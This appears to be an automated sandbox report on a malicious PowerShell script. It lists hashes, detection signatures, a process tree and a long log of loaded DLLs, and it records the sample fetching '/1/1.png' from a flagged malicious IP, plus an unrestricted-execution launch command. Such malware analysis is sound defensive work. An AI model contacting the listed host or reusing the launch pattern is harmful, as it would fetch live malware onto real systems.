Edit tour

Windows Analysis Report
anyrunsample.ps1

Overview

General Information

Sample name:	anyrunsample.ps1
Analysis ID:	1577163
MD5:	cd287bd80c045824ffe703e4f11d0ff7
SHA1:	bf36ec53d169c52edb670fb82e9d54050ba7d277
SHA256:	48f64004d6117fe2a7ff0752f7f91853506ceb1dffdc5cbe1d083ad1c1b4b4ef
Tags:	92-255-57-155ps1user-JAMESWT_MHT
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

AI detected suspicious sample

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1", ProcessId: 6336, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1", ProcessId: 6336, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://92.255.57.155/1/1.png

Avira URL Cloud: Label: malware

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.9% probability

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: global traffic

HTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.155Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155

Source: global traffic

HTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.155Connection: Keep-Alive

Source: powershell.exe, 00000000.00000002.1722951881.00000222DC593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.155
Source: powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp, anyrunsample.ps1	String found in binary or memory: http://92.255.57.155/1/1.png
Source: powershell.exe, 00000000.00000002.1722951881.00000222DC593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.H
Source: powershell.exe, 00000000.00000002.1742106086.00000222F3BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso3
Source: powershell.exe, 00000000.00000002.1737296887.00000222EB7B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1722951881.00000222DB741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1742106086.00000222F3C1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.1742106086.00000222F3BDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1722951881.00000222DB741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1722951881.00000222DB968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1722951881.00000222DC593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1737296887.00000222EB7B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1722951881.00000222DD128000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1722951881.00000222DCD8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: classification engine

Classification label: mal52.winPS1@2/5@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvh2smtk.rhv.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\anyrunsample.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFD9B893428 push E95B7D43h; ret

0_2_00007FFD9B893459

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
